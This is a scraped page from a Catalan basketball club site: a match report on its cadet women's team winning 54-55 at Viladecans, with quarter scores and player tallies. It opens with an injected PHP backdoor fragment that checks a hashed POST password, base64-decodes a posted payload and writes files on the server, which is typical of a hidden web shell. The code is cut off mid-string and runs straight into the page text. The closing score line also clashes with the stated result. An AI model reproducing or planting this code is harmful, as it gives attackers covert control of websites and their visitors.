function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Cadet 08A guanya en un final d'infart (54-55) - Tgn Bàsquet Club -

El Cadet 08A guanya en un final d’infart (54-55)

Updated: març 13, 2024

Després de dues derrotes consecutives aquesta setmana ens desplacem a Viladecans. Segon classificat de la lliga i prova de foc per comprovar si la derrota dolorosa de la setmana passada ha servit per alguna cosa. Esperem haver aprés que sense treball ni esperit defensiu qualsevol equip ens passa per sobre.

Comencem el partit donant la cara, veiem aquell tgn reconeixible en defensa. Tot i que en els primers instants de partit les locals agafen un diferència de 4 punts a favor, les nostres liles impedeixen anotar, protegeixen l’aro i encertem amb molt bones decisions en atac. Acabem el quart 10-19. Tornen les bones sensacions i l’equip es sent a gust a la pista.

En el segon quart les diferències en el marcador i la dinàmica del partit és la mateixa fins que a manca de 3 minuts per la mitja part, deixem de jugar en equip, no compartim la pilota i deixem d’anotar. Les locals noten que baixem el ritme, s’ho creuen, pugen línies defensives i s’acosten en el marcador fins un 29-30 a la mitja part.

En el vestuari parlem que l’equip està donant bones sensacions i que era el nostre objectiu per avui. Que teníem un molt bon equip davant i que competir fora és sempre molt difícil. Calia seguir així. Principi del tercer quart calcat al primer quart. Elles es posen per davant en el marcador i nosaltres reaccionem. Encertem amb 3 triples consecutius. 36 -43 al final del tercer quart.

En el darrer quart aguantem el marcador però les locals no baixen els braços i aprofiten per posar-se 1 punt per sobre a manca de 5 minuts 46-45. Reaccionem i ens posem 5 punts per sobre gràcies a una defensa molt solidaria, ens ajudem molt i sobretot tanquem molt bé el rebot defensiu i tornen les pors a perdre, no sabem jugar amb el marcador, arrisquem  excessivament en atac i les locals es posen 1 punt per sota a manca de 5 segons, temps mort i pilota per elles. Ens posem en defensa zonal 2-3 amb les nostres 3 jugadores grans per protegir l’aro. Una bona defensa i un excel·lent treball en el rebot defensiu ens permet guanyar un partit que ens hem deixat remuntar fins a dues vegades durant el partit.

Crec que si! Lliçó de la setmana passada apresa! Si no defensem i no som generoses amb l’esforç, no competim! És la nostra millor arma!. A veure si ens adonem que no “hay enemigo pequeño” i que tots els partits s’han de jugar des del minut 1! La propera setmana ens visita JET, duríssim equip que sempre ens ha posat les coses molt, molt difícils. Força TGN!!

VILADECANS 54 VS CADET FEM 08A 54

Parcials: 10-19; 29-30 ; 36-43 ; 54-55

TGN: DIANA 4 ; JUNY 5, SOFIA 10 ; MARINA 21 , DANIELA 0; HELENA 0 ; JULIA 6 ; ÈLIA 0 ;
MARTA 3, MIREIA 0; LUCIA 4, PAULA 2

VILADECANS: MARTA 0, XÈNIA 3,MIRIAM 12, NOA 14, ALBA 18, MARIONA 3, MARA 0; MARIA